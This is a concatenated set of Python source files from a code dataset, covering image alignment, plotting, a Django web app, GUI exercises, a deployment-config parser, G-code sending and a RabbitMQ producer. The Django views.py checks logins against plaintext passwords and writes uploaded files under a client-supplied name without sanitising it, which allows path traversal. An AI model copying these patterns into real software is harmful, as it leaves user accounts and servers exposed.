self.text1.GetValue()\n path2 = self.text2.GetValue()\n \n if(path1 != NoFileSelected and path2 != NoFileSelected):\n detectEdges = self.detectEdges.GetValue()\n worker = AlignWorkerThread(self, path1, path2, detectEdges)\n\n def onCopyToClipboard(self, button):\n # check that im3 exists\n try:\n self.img3\n except:\n return\n\n # copy overlay image file to clipboard\n app = QtWidgets.QApplication([])\n data = QtCore.QMimeData()\n cwd = os.getcwd()\n overlayFilePath = os.path.join(cwd, overlayFile)\n url = QtCore.QUrl.fromLocalFile(overlayFilePath)\n data.setUrls([url])\n app.clipboard().setMimeData(data)\n\nclass AlignWorkerThread(Thread):\n \n def __init__(self, frame, path1, path2, detectEdgesBool):\n Thread.__init__(self)\n self.frame = frame\n self.path1 = path1\n self.path2 = path2\n self.detectEdgesBool = detectEdgesBool\n self.start()\n\n def detectEdges(self, path):\n img = skimage.io.imread(path)\n img_grey = skimage.color.rgb2grey(img)\n edge_sobel = skimage.filters.sobel(img_grey)\n edge_inverted = skimage.util.invert(edge_sobel)\n return edge_inverted\n\n def run(self):\n # this needs to be in a thread to not 
lock up the gui\n self.frame.alignStatus.Show() \n\n # apply edge detection to both input images\n if(self.detectEdgesBool):\n skim1edges = self.detectEdges(self.path1)\n skim2edges = self.detectEdges(self.path2)\n skimage.io.imsave(edges1File,skim1edges)\n skimage.io.imsave(edges2File,skim2edges)\n im1wx = wx.Image(edges1File, wx.BITMAP_TYPE_ANY)\n im2wx = wx.Image(edges2File, wx.BITMAP_TYPE_ANY)\n else:\n im1wx = wx.Image(self.path1, wx.BITMAP_TYPE_ANY)\n im2wx = wx.Image(self.path2, wx.BITMAP_TYPE_ANY)\n\n # scale image 2\n w1 = im1wx.GetWidth()\n h1 = im1wx.GetHeight()\n w2 = im2wx.GetWidth()\n h2 = im2wx.GetHeight()\n im2scaled = im2wx.Scale(w1,h1) # not a good scaling method\n im2scaled.SaveFile(image2scaledFile)\n\n # read in image 1 and scaled image 2\n if(self.detectEdgesBool):\n im1 = sp.misc.imread(edges1File,True)\n else:\n im1 = sp.misc.imread(self.path1,True)\n im2 = sp.misc.imread(image2scaledFile,True)\n\n # align image 2\n result = ird.similarity(im1, im2, numiter=3)\n assert \"timg\" in result\n im2aligned = result['timg']\n\n # overlay\n overlay = im1 + im2aligned\n sp.misc.imsave(overlayFile,overlay)\n\n # display overlay\n self.frame.img3 = wx.Image(overlayFile, wx.BITMAP_TYPE_ANY)\n img3thumb = self.frame.img3.Scale(OutputMaxSize,OutputMaxSize)\n self.frame.imageCtrl3.SetBitmap(wx.Bitmap(img3thumb))\n self.frame.Refresh()\n\n self.frame.alignStatus.Hide()\n\nclass MyApp(wx.App):\n def OnInit(self):\n frame = MainWindow(None, -1, \"Image Alignment Tool\")\n self.SetTopWindow(frame)\n return True\n\n# Declare the Application and start the Main Loop\napp = MyApp(0)\napp.MainLoop()","sub_path":"registrationGUI/imageRegGUI.py","file_name":"imageRegGUI.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"349804937","text":"from math import pi\nimport matplotlib.pyplot as plt\n\ndef plot_count(feature, title,xlabel, df, size=1):\n f, ax = plt.subplots(1,1, figsize=(4*size,6))\n total = float(len(df))\n g = sns.countplot(df[feature], order = df[feature].value_counts().index[:30], palette='Set3')\n g.set_title(\"Distribution of {}\".format(title), fontsize = 16)\n if(size > 2):\n plt.xticks(rotation=90, size=8)\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x()+p.get_width()/2.,\n height + 3,\n '{:1.2f}%'.format(100*height/total),\n ha=\"center\")\n #plt.xlabel(xlabel, fontsize = 16)\n plt.xlabel('')\n plt.ylabel('Count', fontsize = 16)\n plt.xticks(fontsize = 16)\n plt.savefig(f'img/{title}.png', dpi = 500, bbox_inches = 'tight')\n plt.show()\n \ndef make_spider( df, row, title, color):\n # initialize the figure\n plt.figure(figsize=(10, 10))\n # number of variable\n categories=list(df)\n N = len(categories)\n\n # What will be the angle of each axis in the plot? 
(we divide the plot by the number of variables)\n    angles = [n / float(N) * 2 * pi for n in range(N)]\n\n    # Initialise the spider plot\n    ax = plt.subplot(1,1,row+1, polar=True, )\n\n    # If you want the first axis to be on top:\n    ax.set_theta_offset(pi / 2)\n    ax.set_theta_direction(-1)\n\n    # Draw one axis per variable and add the category labels\n    plt.xticks(angles, categories, color='k', size=15)\n\n    # Draw ylabels\n    ax.set_rlabel_position(0)\n    plt.yticks([0.05,.1,.15], [\"5\",\"10\",\"15\"], color=\"grey\", size=12)\n    plt.ylim(0,0.2)\n#    plt.yticks([0.1,.2,.3, 0.4, 0.5], [\"10\",\"20\",\"30\",\"40\", \"50\"], color=\"grey\", size=12)\n#    plt.ylim(0,0.6)\n\n    # Ind1\n    values=df.loc[row].values.flatten().tolist()\n    values += values[:1]\n    angles += angles[:1]\n    ax.plot(angles, values, color=color, linewidth=2, linestyle='solid')\n    ax.fill(angles, values, color=color, alpha=0.4)\n\n    # Add a title\n    #plt.title(title, size=16, color=color, y=1.1)\n","sub_path":"visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"327641386","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django import forms\nimport sys\n\nfrom login.models import User\nfrom login.views import check_login\nimport json\n\n\n@check_login\ndef hello(request, name='index.html'):\n\n    htmls = ['calendar.html', 'chart.html', 'file-manager.html', 'form.html', 'gallery.html', 'icon.html', 'index.html',\n             'login.html', 'messages.html', 'submenu.html', 'submenu2.html', 'submenu3.html', 'table.html', 'tasks.html',\n             'typography.html', 'ui.html', 'widgets.html', 'file_upload.html', '404.html', 'data_preview.html', 'algorithm_preview.html',\n             \"run_manage.html\",\n             \"algorithm_go.html\",'data.html']\n    print(name, \"=====================================================\")\n    if name in htmls:\n        return render(request, name)\n    else:\n        return render(request, '404.html')\n\n\ndef login_user(request):\n    print(\"LOGIN\")\n    if request.method == 'POST':\n        print(request.POST)\n        all_data = request.POST\n        print(all_data)\n        exist = User.objects.filter(username=all_data['username'], password=all_data['password']).first()\n        print('EXIST', exist)\n        if exist:\n            request.session['is_login'] = True  # mark the session as logged in\n            request.session['username'] = exist.username  # store the logged-in user's name in the session\n            return redirect('/index.html')\n        else:\n            return HttpResponse(\"Incorrect username or password\")\n    else:\n        return render(request, 'login.html')\n\n\n@check_login\ndef upload(request):\n    if request.method == 'POST':\n        file_obj = request.FILES.get('file', None)\n        print(file_obj.name)\n        print(file_obj.size)\n        with open('media/' + file_obj.name, 'wb') as f:\n            for line in file_obj.chunks():\n                f.write(line)\n            f.close()\n\n        data = dict()\n        data['status'] = 1\n        return HttpResponse(json.dumps(data), content_type='application/json')\n\n","sub_path":"web_gov/web_gov/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"270534044","text":"def convert(n, base):\n    temp = \"0123456789ABCDEF\"\n    q, r = divmod(n, base)\n\n    if q == 0:\n        return temp[r]\n    else:\n        return convert(q, base) + temp[r]\n\n\ndef solution(n, t, m, p):\n    answer = ''\n    temp =''\n    for i in range(m*t):\n        temp += convert(i,n)\n    \n    while len(answer) < t:\n        answer += temp[p-1]\n        p += m\n\n    return answer\n\nn = 16\nt = 16 \nm = 2\np = 
1\n\n\nprint(solution(n,t,m,p))","sub_path":"4.programmers/practice/Prog_2018_KAKAO_n진수게임.py","file_name":"Prog_2018_KAKAO_n진수게임.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157711321","text":"'''\n2. Latin Translator\n    Look at the following list of Latin words and their meanings.\n    Latin English\n    sinister left\n    dexter right\n    medium center\n    Write a GUI program that translates the Latin words to English. The window should have\n    three buttons, one for each Latin word. When the user clicks a button, the program displays \n    the English translation in a label.\n'''\n\nimport tkinter as tk\nfrom functools import partial\n\ndef main():\n    # Instantiate the window\n    window = tk.Tk()\n\n    # set the window geometry and title\n    window.geometry('400x400')\n    window.title('Latin Translator')\n\n    # define the function to show the info\n    def display_English(p_latin):\n        # define blank labels that the translation dictionary below references\n        labelLeft = None\n        labelRight = None\n        labelCenter = None\n        # Define a translation dictionary with the Latin words as a key\n        translation = {\n            'sinister' : {'English': 'left', 'label' : labelLeft, 'col' : 0},\n            'dexter' : {'English': 'right', 'label' : labelRight, 'col' : 2},\n            'medium' : {'English': 'center', 'label' : labelCenter, 'col' : 1}\n        }\n        # prepare the label to display\n        translation[p_latin]['label'] = tk.Label(master=window, text=translation[p_latin]['English'])\n        translation[p_latin]['label'].grid(column=translation[p_latin]['col'], row=3)\n\n    # build a title header label for the window\n    titleLatin = tk.Label(text='Latin')\n    titleLatin.grid(row=0, column=1, padx=5, pady=5, sticky='nsew')\n    titleEnglish = tk.Label(text='English')\n    titleEnglish.grid(row=2, column=1, padx=5, pady=5, sticky='nsew')\n\n    # Build the buttons that call the display translation function when clicked\n    buttonleft = tk.Button(text='sinister', command=partial(display_English, 'sinister'))\n    buttonleft.grid(column=0, row=1, padx=10, pady=10)\n    buttoncenter = tk.Button(text='medium', command=partial(display_English, 'medium'))\n    buttoncenter.grid(column=1, row=1, padx=10, pady=10)\n    buttonright = tk.Button(text='dexter', command=partial(display_English, 'dexter'))\n    buttonright.grid(column=2, row=1, padx=10, pady=10)\n\n\n    # call the window mainloop function\n    window.mainloop()\n\n# Call the main function\nmain()","sub_path":"studentCode/GUI/gui_latin_translator.py","file_name":"gui_latin_translator.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"646101869","text":"# Interpreter program for reading Nord Pool day-ahead price data\n# from a txt file and interpreting it for the scheduler program\n\n######### DATA GENERATION #########\n\njarj=[] #Initialize the price-order variable\nminim=0 #Initialize the minimum-value variable\n\ndef jarjestys(tiedot): # Builds a list of the hours sorted from cheapest to most expensive.\n\ti=0\n\tkeys=tiedot.keys()\n\t\n\tlista=sorted(keys, key=tiedot.__getitem__)\n\treturn lista\n\ndef minimi(tiedot):\n\tminim = min(tiedot, key=tiedot.get)\n\tprint(minim)\n\treturn minim\n\ndef delta(tiedot, min): # Computes the price difference between hours. 
The first hour of the day is shown as zero.\n\tlista=[]\n\tfor rivi in tiedot:\n\t\tif rivi > 0:\n\t\t\tarvo=float(((tiedot[rivi]-tiedot[min])/tiedot[min]))\n\t\t\tlista.append(arvo)\n\t\telse:\n\t\t\tarvo = 0\n\t\t\tlista.append(arvo)\n\t\tprint(\"{:.2f}\".format(arvo))\n\treturn lista\n\t\t\ndef xmlparsinta(tiedot): # Imports the parsinta.py module, which reads the price data from the xml file into the tiedot dictionary\n\timport parsinta\n\ttiedot = parsinta.luetiedot(tiedot)\n\treturn tiedot\n\n######### DATA PROCESSING #########\n\t\n######### MAIN #########\ndef main():\n\ttiedot={}\n\ttry:\n\t\ttiedot=xmlparsinta(tiedot)\n\t\tfor rivi in tiedot:\n\t\t\tprint(rivi, tiedot[rivi])\n\n\t\tjarj=jarjestys(tiedot)\n\t\tminim=minimi(tiedot)\n\t\tmuutos=delta(tiedot, minim)\n\t\tprint(muutos)\n\texcept OSError:\n\t\tprint(\"Error reading the file.\")\n\t\nmain()","sub_path":"tulkinta.py","file_name":"tulkinta.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"627429131","text":"from heft.algs.ga.GAImplementation.GAImpl import GAFactory\nfrom heft.core.CommonComponents.ExperimentalManagers import ExperimentResourceManager, ExperimentEstimator\nfrom heft.core.environment import ResourceGenerator\nfrom heft.core.environment.ResourceManager import Schedule\nfrom heft.core.environment.Utility import profile_decorator, wf\n\n\n_wf = wf(\"Montage_100\")\nresources = ResourceGenerator.r([10, 15, 25, 30])\nresource_manager = ExperimentResourceManager(resources)\nestimator = ExperimentEstimator(None, ideal_flops=20, reliability=1.0, transfer_time=100)\n\nga = GAFactory.default().create_ga(silent=True,\n                                   wf=_wf,\n                                   resource_manager=resource_manager,\n                                   estimator=estimator,\n                                   ga_params={\n                                       \"population\": 10,\n                                       \"crossover_probability\": 0.8,\n                                       \"replacing_mutation_probability\": 0.5,\n                                       \"sweep_mutation_probability\": 0.4,\n                                       \"generations\": 20\n                                   })\n\n@profile_decorator\ndef fnc():\n    empty_schedule = Schedule({node: [] for node in resource_manager.get_nodes()})\n    res = ga(empty_schedule, None)\n    print(res)\n    pass\n\nif __name__ == \"__main__\":\n    fnc()\n\n\n","sub_path":"heft/algs/ga/utilities/Profiling.py","file_name":"Profiling.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"501385095","text":"# -*- coding: utf-8 -*-\n# requires protobuf to be installed\nimport gen_py_from_pb\nimport sys\nimport os\ngen_py_from_pb.gen_py_from_pb('./deploy/proto/')\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(__file__)), \"./proto/\"))\nfrom google.protobuf import text_format\nfrom gcm_pb2 import *\nfrom loghelper import LogError\n\n\nclass ArtifactInstance:\n    def __init__(self):\n        self.instance_id = None  # the instance's address, e.g. 5.1.7.2\n        self.instance_name = None  # the instance's name-based address, e.g. test.zone_1.logic_svr.2\n        self.artifact_name = None  # name of the artifact this instance belongs to, e.g. logic_svr\n        self.host_name = None  # name of the target server the instance is deployed to, e.g. server1\n        self.inner_ip = None  # intranet IP of the target server, e.g. 192.168.1.100\n        self.outer_ip = None  # public IP of the target server, e.g. 100.233.66.39\n        self.deploy_ip = None  # deployment IP of the target server, e.g. 192.168.1.100\n        self.start_priority = 0  # start priority of the instance, default 0; higher values start first.\n        # self.__emergence_order = None  # order in which the instance appears in deploy.conf (used to decide start order)\n        self.artifact = None\n        self.index = 0\n\n    def __str__(self):\n        return self.instance_id + \" \" + self.instance_name\n\n\nclass GcmData:\n    def __init__(self):\n        
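# parsed configuration state, populated by init() via _load_conf() below\n        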
self.host_map = {}\n self.agent_artifact = None\n self.template_artifact_map = {}\n self.artifact_map = {}\n self.artifact_group_map = {}\n self.deploy_info = DeployInfo()\n self.variable_map = {}\n self.world_map = {}\n self.artifact_instances = []\n\n def init(self, conf_paths):\n for path in conf_paths:\n self._load_conf(path)\n # check syntax\n self._check_syntax()\n self._convert_template_artifacts()\n self._gen_instance()\n\n def _load_conf(self, conf_path):\n # parse hosts.conf\n host_cfg = HostCfg()\n host_path = os.path.join(conf_path, 'hosts.conf')\n self._load_proto(host_path, host_cfg)\n for host in host_cfg.hosts:\n self.host_map[host.name] = host\n\n # parse agent_artifacts.conf\n agent_artifact = AgentArtifact()\n agent_artifact_path = os.path.join(conf_path, 'agent_artifacts.conf')\n self._load_proto(agent_artifact_path, agent_artifact)\n self.agent_artifact = agent_artifact\n\n # parse artifact_templates.conf\n template_artifact = TemplateArtifact()\n artifact_templates_path = os.path.join(conf_path, 'artifact_templates.conf')\n self._load_proto(artifact_templates_path, template_artifact)\n for item in template_artifact.template_artifacts:\n self.template_artifact_map[item.template_name] = item\n\n # parse artifacts.conf\n normal_artifact = NormalArtifact()\n artifact_path = os.path.join(conf_path, 'artifacts.conf')\n self._load_proto(artifact_path, normal_artifact)\n for item in normal_artifact.artifacts:\n self.artifact_map[item.name] = item\n\n # parse artifact_groups.conf\n artifact_group = ArtifactGroup()\n artifact_groups_path = os.path.join(conf_path, 'artifact_groups.conf')\n self._load_proto(artifact_groups_path, artifact_group)\n for item in artifact_group.artifact_groups:\n self.artifact_group_map[item.name] = item\n\n # parse deploy.conf\n deploy_path = os.path.join(conf_path, 'deploy.conf')\n deploy = Deploy()\n self._load_proto(deploy_path, deploy)\n for var in deploy.variables:\n self.variable_map[var.key] = var.value\n\n # parse global const variable\n self.deploy_info.tmp_root_path = deploy.tmp_root_path\n self.deploy_info.dst_root_path = deploy.dst_root_path\n self.deploy_info.listen_port = deploy.listen_port\n\n for word in deploy.worlds:\n if word.name in self.world_map:\n LogError('world name: %s is duplicated' % word.name)\n raise BaseException()\n else:\n self.world_map[word.name] = word\n\n @staticmethod\n def _load_proto(file_path, proto):\n if not os.path.exists(file_path):\n return\n with open(file_path) as f:\n text_format.Parse(f.read(), proto)\n\n def _check_syntax(self):\n function_id_set = set()\n for name, artifact in self.artifact_map.items():\n if artifact.function_id in function_id_set:\n LogError('function_id: %d is duplicated in artifacts.conf' % artifact.function_id)\n raise BaseException()\n function_id_set.add(artifact.function_id)\n\n world_id_set = set()\n for world_name in self.world_map:\n world = self.world_map[world_name]\n if not world.name:\n LogError('world name is empty in world_id:%d' % world.id)\n raise BaseException()\n if not world.id:\n LogError('world id is empty in world_name:%s' % world.name)\n raise BaseException()\n if not world.user:\n LogError('user is empty in world_name:%s' % world.name)\n raise BaseException()\n if not world.passwd:\n LogError('passwd is empty in world_name:%s' % world.name)\n raise BaseException()\n if world.id in world_id_set:\n LogError('world id: %d is duplicated' % world.id)\n raise BaseException()\n\n world_id_set.add(world.id)\n zone_name_set = set()\n zone_id_set = set()\n\n for zone 
in world.zones:\n if not zone.name:\n LogError('zone name: is empty in world name: %s' % world.name)\n raise BaseException()\n if not zone.id:\n LogError('zone id: is empty in world name: %s' % world.name)\n raise BaseException()\n if zone.name in zone_name_set:\n LogError('zone name: %s is duplicated in world name: %s' % (zone.name, world.name))\n raise BaseException()\n if zone.id in zone_id_set:\n LogError('zone id: %d is duplicated in world name: %s' % (zone.id, world.name))\n raise BaseException()\n\n zone_name_set.add(zone.name)\n zone_id_set.add(zone.id)\n groups_set = []\n\n for groups in zone.instance_groups:\n if not groups.artifact_group_name:\n LogError('artifact_group_name is empty in zone:%s in world:%s' % (zone.name, world_name))\n raise BaseException()\n if not groups.host_name:\n LogError('host_name is empty in zone:%s in world:%s' % (zone.name, world_name))\n raise BaseException()\n if not groups.instance_id:\n LogError('instance_id is empty in zone:%s in world:%s' % (zone.name, world_name))\n raise BaseException()\n if [groups.artifact_group_name, groups.instance_id] in groups_set:\n LogError('group_name: %s, instance_id: %d is duplicated in zone name: %s in world name: %s'\n % (groups.artifact_group_name, groups.instance_id, zone.name, world.name))\n raise BaseException()\n groups_set.append([groups.artifact_group_name, groups.instance_id])\n\n def _convert_template_artifacts(self):\n for name, artifact in self.artifact_map.items():\n if not artifact.template_name:\n continue\n if artifact.template_name not in self.template_artifact_map:\n LogError(\"can't find template artifacts name: %s in artifacts name: %s\"\n % (artifact.template_name, name))\n raise BaseException()\n template_artifact = self.template_artifact_map[artifact.template_name]\n artifact.files.MergeFrom(template_artifact.files)\n\n def _gen_instance(self):\n for world_name, world in self.world_map.items():\n for zone in world.zones:\n zone_name = zone.name\n for inst_groups in zone.instance_groups:\n group_name = inst_groups.artifact_group_name\n if group_name not in self.artifact_group_map:\n pformat = \"can't find artifact_group_name: %s in zone_name:%s in world_name:%s in artifact_groups.conf\"\n LogError(pformat % (group_name, zone_name, world_name))\n raise BaseException()\n if inst_groups.host_name not in self.host_map:\n pformat = \"can't find host_name: %s in zone_name:%s in world_name:%s in hosts.conf\"\n LogError(pformat % (inst_groups.host_name, zone_name, world_name))\n raise BaseException()\n group = self.artifact_group_map[group_name]\n for artifact_name in group.artifact_names:\n if artifact_name not in self.artifact_map:\n LogError(\"can't find artifact_group:%s's artifact_name:%s in artifacts.conf\"\n % (group_name, artifact_name))\n raise BaseException()\n artifact = self.artifact_map[artifact_name]\n host = self.host_map[inst_groups.host_name]\n instance = ArtifactInstance()\n instance.instance_id = '%d.%d.%d.%d' % (world.id, zone.id, artifact.function_id, inst_groups.instance_id)\n instance.instance_name = '%s.%s.%s.%s' % (world_name, zone_name, artifact.name, inst_groups.instance_id)\n instance.artifact_name = artifact_name\n instance.host_name = inst_groups.host_name\n instance.inner_ip = host.inner_ip\n instance.outer_ip = host.outer_ip\n instance.deploy_ip = host.deploy_ip\n instance.start_priority = artifact.start_priority\n 
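# keep the fully resolved instance; callers read artifact_instances after init() finishes\n                        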
self.artifact_instances.append(instance)\n\n\n\n","sub_path":"fk/deploy/src/gcm_data.py","file_name":"gcm_data.py","file_ext":"py","file_size_in_byte":10624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"438750685","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/12/21 23:21\n# @Author : play4fun\n# @File : gcode_write_dragon.py\n# @Software: PyCharm\n\n\"\"\"\ngcode_write_dragon.py:\nBrush calligraphy: 龙 (dragon)\n\"\"\"\n\nimport sys, os\nfrom time import sleep\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom uf.ufc import ufc_init\nfrom uf.comm.serial_ascii import SerialAscii\nfrom uf.utils.log import *\n\nlogger_init(logging.VERBOSE)\n\nprint('setup ser_ascii ...')\n\nser_iomap = {\n 'out': 'ser_out',\n 'in': 'ser_in',\n 'service': 'ser_service'\n}\n\nufc = ufc_init()\nser_ascii = SerialAscii(ufc, 'ser_ascii', ser_iomap, filters={'hwid': 'USB VID:PID=2341:0042'})\n\nprint('setup test ...')\nlogger = logging.getLogger('test')\n\n\ndef ser_out_cb(msg):\n logger.debug('callback: ' + msg)\n\n\ntest_ports = {\n 'ser_out': {'dir': 'in', 'type': 'topic', 'callback': ser_out_cb},\n 'ser_in': {'dir': 'out', 'type': 'topic'},\n 'ser_service': {'dir': 'out', 'type': 'service'}\n}\n\ntest_iomap = {\n 'ser_out': 'ser_out',\n 'ser_in': 'ser_in',\n 'ser_service': 'ser_service'\n}\n\nufc.node_init('test', test_ports, test_iomap)\n\nprint('\\nsleep 2 sec ...\\n')\nsleep(2)\n\n# print('\\nset X330 ...')\n# test_ports['ser_in']['handle'].publish('G0 X300 Y0 Z50')\n\n\n\nwith open('long_0001.GCODE') as f:\n gcodes = f.readlines()\n\n# print(gcodes)\n\nfor line in gcodes:#[:40]:\n if line.strip() == '':\n continue\n print(line)\n test_ports['ser_in']['handle'].publish(line)\n sleep(0.1)\n\nwhile True:\n sleep(1)","sub_path":"test2/gcode_write_dragon.py","file_name":"gcode_write_dragon.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"34660390","text":"import pandas as pd\nimport numpy as np\nprevalence = pd.read_feather('tables/genes.1m.unique.prevalence.feather')\nprevalence.set_index('index', inplace=True)\n\n\nhists = {}\nfor c in prevalence.columns:\n if c in ['amplicon', 'isolate']:\n continue\n hists[c] = np.bincount(prevalence[c])\n\nsize = max(len(v) for v in hists.values())\nnhists = {}\nfor k,v in hists.items():\n c = np.zeros(size, dtype=int)\n c[:len(v)] = v\n nhists[k] = c\n\nnhists = pd.DataFrame(nhists)\nnhists.to_csv('tables/genes.prevalence.1m.hists.txt', sep='\\t')\n","sub_path":"profiles-all/gene.profiles/create-prevalence-histograms.1m.py","file_name":"create-prevalence-histograms.1m.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"383537414","text":"\"\"\"Faster RCNN Demo script.\"\"\"\nimport os\nimport argparse\nimport mxnet as mx\nimport gluoncv as gcv\nfrom gluoncv.data.transforms import presets\nfrom matplotlib import pyplot as plt\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Test with Faster RCNN networks.')\n parser.add_argument('--network', type=str, default='faster_rcnn_resnet50_v2a_voc',\n help=\"Faster RCNN full network name\")\n parser.add_argument('--short', type=str, default='',\n help='Resize image to the given short side, default to 600 for voc.')\n parser.add_argument('--max-size', type=str, default='',\n help='Max size of either side of image, default to 1000 for voc.')\n 
parser.add_argument('--images', type=str, default='',\n help='Test images, use comma to split multiple.')\n parser.add_argument('--gpus', type=str, default='0',\n help='Training with GPUs, you can specify 1,3 for example.')\n parser.add_argument('--pretrained', type=str, default='True',\n help='Load weights from previously saved parameters. You can specify parameter file name.')\n args = parser.parse_args()\n dataset = args.network.split('_')[-1]\n if dataset == 'voc':\n args.short = int(args.short) if args.short else 600\n args.max_size = int(args.max_size) if args.max_size else 1000\n elif dataset == 'coco':\n args.short = int(args.short) if args.short else 800\n args.max_size = int(args.max_size) if args.max_size else 1333\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n # context list\n ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()]\n ctx = [mx.cpu()] if not ctx else ctx\n\n # grab some image if not specified\n if not args.images.strip():\n gcv.utils.download(\"https://cloud.githubusercontent.com/assets/3307514/\" +\n \"20012568/cbc2d6f6-a27d-11e6-94c3-d35a9cb47609.jpg\", 'street.jpg')\n image_list = ['street.jpg']\n else:\n image_list = [x.strip() for x in args.images.split(',') if x.strip()]\n\n if args.pretrained.lower() in ['true', '1', 'yes', 't']:\n net = gcv.model_zoo.get_model(args.network, pretrained=True)\n else:\n net = gcv.model_zoo.get_model(args.network, pretrained=False)\n net.load_parameters(args.pretrained)\n net.set_nms(0.3, 200)\n\n ax = None\n for image in image_list:\n x, img = presets.rcnn.load_test(image, short=args.short, max_size=args.max_size)\n ids, scores, bboxes = [xx.asnumpy() for xx in net(x)]\n ax = gcv.utils.viz.plot_bbox(img, bboxes, scores, ids,\n class_names=net.classes, ax=ax)\n plt.show()\n","sub_path":"scripts/detection/faster_rcnn/demo_faster_rcnn.py","file_name":"demo_faster_rcnn.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"325635432","text":"# Author: Real \n# CreateTime 2018/9/6-20:08 \n# IDE: PyCharm\n\nimport pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost') # equivalent to creating a socket\n\n)\n# A good analogy: the channel is the route that messages travel along, like a highway; many cars can run on one road,\n# and those cars are the queues, while the passengers in the cars are the data we want to send. So the channel is the route and the queue is the carrier.\n\nchannel = connection.channel() # declare a channel (the route); messages are sent through the channel\n\nchannel.queue_declare(queue='hello') # declare the message carrier --- the name of the queue\n\n# publish the message\nchannel.basic_publish(\n exchange='', # the exchange is the message-forwarding node\n routing_key='hello', # the queue defined in the channel (pipe), i.e. the carrier of the message\n body='hello world!' 
# body is the message content\n)\n\nconnection.close()","sub_path":"进阶/消息队列/RabbitMQ简单实现/0.RabbitMQ_Producer.py","file_name":"0.RabbitMQ_Producer.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"363308510","text":"from util.data_container import StructTestContainer\nfrom util.data_interface import JsonDAO\nfrom util.plot import Plotter\nimport numpy as np\nfrom matplotlib.pyplot import subplot\n\nlayers_to_test = (2, 4, 5, 8, 10)\nneurons_per_layer_to_test = (3, 5, 10, 15, 20)\n\npaths = ['results/van_der_pol/2020-10-23-07-07-43-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-07-48-25-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-07-58-41-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-08-50-27-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-08-56-52-nn-structural-test/data.json']\n\nfinal_val_losses_matrixes = list()\nval_losses_20 = {4: list(), 5: list(), 8: list(), 10: list()}\nval_losses_10 = {4: list(), 5: list(), 8: list(), 10: list()}\nval_losses_len = 6329 #6360\n\ndao = JsonDAO()\n\nfor path in paths:\n dictionary = dao.load(path)\n data_container = StructTestContainer()\n data_container.results = dictionary\n final_losses = data_container.get_final_val_losses(layers_to_test, neurons_per_layer_to_test)\n final_val_losses_matrixes.append(final_losses)\n \n for layers in val_losses_10.keys():\n val_losses_10[layers].append(np.array(data_container.get_val_loss(layers, neurons=10)[:val_losses_len]))\n\n for layers in val_losses_20.keys():\n val_losses_20[layers].append(np.array(data_container.get_val_loss(layers, neurons=20)[:val_losses_len]))\n\nfor layers in val_losses_10.keys():\n val_losses_10[layers] = sum(val_losses_10[layers])/len(val_losses_10[layers])\n val_losses_20[layers] = sum(val_losses_20[layers])/len(val_losses_20[layers])\n\nplot_matrix = sum(final_val_losses_matrixes)/len(final_val_losses_matrixes)\n\nplotter = Plotter(fontsize=11)\nfigsize=(4.5, 4)\n\nplotter.plot_heatmap(data=np.log10(plot_matrix),\n title='$\\\log$(MSE)', # validation\n x_label='Neurons per Layer',\n y_label='Number of Layers',\n row_labels=layers_to_test,\n col_labels=neurons_per_layer_to_test,\n figsize=figsize)\nloss_len = len(val_losses_10[4])\n\n## -\n\nplotter.plot(x_axis=np.linspace(1, loss_len, loss_len),\n y_axis_list=list(val_losses_10.values()),\n labels=[str(layers) + 'L of 10N' for layers in val_losses_10.keys()],\n title='MSE',\n x_label='Epoch',\n y_label=None,\n y_scale='log',\n line_styles=['-', '--', '-', '--'])\n\nplotter.plot(x_axis=np.linspace(1, loss_len, loss_len),\n y_axis_list=list(val_losses_20.values()),\n labels=[str(layers) + 'L of 20N' for layers in val_losses_20.keys()],\n title='MSE',\n x_label='Epoch',\n y_label=None,\n y_scale='log',\n line_styles=['-', '--', '-', '--'])\nplotter.show()\n","sub_path":"structural_test_avg_plot.py","file_name":"structural_test_avg_plot.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
